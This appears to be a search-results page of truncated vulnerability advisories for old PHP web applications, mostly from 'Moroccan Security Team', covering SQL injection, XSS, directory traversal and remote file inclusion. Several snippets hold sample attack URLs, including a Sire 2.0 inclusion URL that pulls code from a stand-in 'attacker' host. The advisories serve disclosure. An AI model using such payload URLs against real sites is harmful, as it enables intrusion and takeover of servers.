23 matches found
LinksCaffe30.txt
LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties Produce : LinksCaffe 3.0 Website : http://gonafish.com/ Impact : manupulation of data / system access Discovered by : Simo64 - Moroccan Security Team + SQL injection 1Vulnerable code in line 223 in links.php code : $rime =...
FLVPlayer8.txt
Produce : FLV Players 8 Website : http://www.videospark.com + Fullpath Disclosure : 1 http://localhost/flv8/paginate.php Fatal error: Class simplepagemaker: Cannot inherit from undefined class object in /var/www/zero/httpdocs/flv8/paginate.php on line 45 2...
Lazarus Guestbook Cross Site Scripting Vulnerabilities
Produce : Lazarus Guestbook Website : http://carbonize.co.uk/Lazarus/ Version : = 1.6 Problem : Cross Site Scripting 1 The first probleme is in codes-english.php ,"show" parameter in lang/codes-english.php isn't properly sanitised This can be exploited to execute arbitrary HTML and javascript cod...
Pearl Products Multiple Remote File Inclusion
Pearl Products Multiple Remote File Inclusion Discovered By zero Moroccan Security Team Affected softwares: Pearl Forums 2.4 Ngoc Biec 1.4 Pearl For Biz 2.4 Pearl For Mambo 1.6 URL : http://sourceforge.net/projects/pearlforums/ Risk : High Impact: System access ------ PoC...
openGuestbook.txt
Produce : Open Guestbook 0.5 Site : http://sourceforge.net/projects/openguestbook Discovred by: Moroccan Security Team Simo64 Greetz to : And All Friends : Details : ========= +Cross Site Scripting -vulnerable code in header.php on line 5 1 2 3 4 5 -------------------- Exploit :...
Scout Portal Toolkit <= 1.4.0 (forumid) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl =============================================================== Scout Portal Toolkit 1.4.0 Remote SQL injection Exploit Coded By Simo64 Moroccan Security Research Team Specials thx to :Greetz : CiM-Team - CrAsHoVeRrIdE - dabdoub - damip - Darkbite...
Scout Portal Toolkit <= 1.4.0 (forumid) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ==================================================================== Scout Portal Toolkit = 1.4.0 forumid Remote SQL Injection Exploit ==================================================================== !/usr/bin/perl...
singapore gallery <= 0.10.0 Multiple Vulnerabilities
Produce : singapore gallery Versions : 0.10.0 and prior Site : http://www.sgal.org/ Discovred By : Moroccan Security Research Team Simo64 Greetz : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid .:r00tkita - s4mi - Silitix - tahati - And All Friends : - Vulnerable code near...
gphotos.txt
Details The first vulnerability issue is due to an input validation error in "index.php" "diapo.php" and "affich.php" scripts that do not validate "rep","image" variables, which may be exploited to cross site scripting attacks. http://traget/index.php?rep=xss http://traget/diapo.php?rep=xss...
Gphotos Directory Traversal and Cross Site Scripting
Details The first vulnerability issue is due to an input validation error in "index.php" "diapo.php" and "affich.php" scripts that do not validate "rep","image" variables, which may be exploited to cross site scripting attacks. http://traget/index.php?rep=xss http://traget/diapo.php?rep=xss...
Scry Gallery Directory Traversal & Full Path Disclosure Vulnerabilites
Software : Scry Gallery WebSite :http://scry.org/ discovred by :Moroccan Security Team + Directory Traversal : A remote attacker may employ directory traversal strings '../' to access arbitrary files outside of the webroot directory. This flaw is due to an input validation error in the "index.php...
Sire2.0Nws.txt
by Moroccan Security Team Geetz To All Freind +File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "registerglobals" is enabled. lire.php code +Exploit: Exploit...
Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload
+File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "registerglobals" is enabled. lire.php code +Exploit: Exploit http://trajet/lire.php?rub=http://attacker&cahier=1&art=1...
Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability
Exploit for unknown platform in category web applications ============================================================================ Sire 2.0 lire.php Remote File Inclusion/Arbitary File Upload Vulnerability ============================================================================ +File...
DbbS<=2.0-alpha SQL injection
author: DaBDouB-MoSiKaR Moroccan Security Team site: http://www.dbbs.sup.fr/ greetz to : Moroccan Security Team CiM-TeaM and All Freinds exemple: http://target/topics.php?fid=3&limite=sql inbox:DaBDouB-MoSiKaRatmoroccan-securitydotcom...
UBBThreads.txt
+UBBThreads -Founded By Moroccan Security Team +we are DaBDouB-MoSiKaR,simo64,ki11er,Dr.E-Vil,|ucifier +special 10x: to all friends SnIpErSA,CrashOvErrIdE king-hacker,CiM-TeaM,ameer,Dranzelz,Esp!onLeRaVaGe and www.lezr.com +Solution:Upgrade to a version 6.0.3...
dbbs.txt
author: DaBDouB-MoSiKaR Moroccan Security Team site: http://www.dbbs.sup.fr/ greetz to : Moroccan Security Team CiM-TeaM and All Freinds exemple: http://target/topics.php?fid=3&limite=sql inbox:DaBDouB-MoSiKaRatmoroccan-securitydotcom...
nuked-SQL.txt
+nuked-klan +www.nuked-klan.org +founded By Moroccan Security Team +special 10x to:CiM-TeaM,Esp!onLeRaVaGe,nabil,Dranzelz,SnIpErSA,www.lezr.com +exemple +http://target/index.php?file=Calendar&m=sql&y=2006 +have nice day...
dabdoubSQL.txt
author: DaBDouB-MoSiKaR Moroccan Security Team site: www.o2php.com greetz to : Moroccan Security Team CiM-TeaM and All Freinds Solution: intval exemple: http://target/post.php?action=newthread&fid=sql inbox:DaBDouB-MoSiKaRatmoroccan-securitydotcom...
MediaSlash Gallery 'rub' variable Remote File inlcusion Vulnerability
author: Moroccan Security Team Vendor: www.MediaSlash.com Vendor Contacted greetz to : Moroccan Security Team CiM-TeaM and All Freinds Google : Powered by MediaSlash.com Details: MediaSlash Galleryis is vulnerable to remote URL inclusion vulnerability This flaw is due to an input validation error...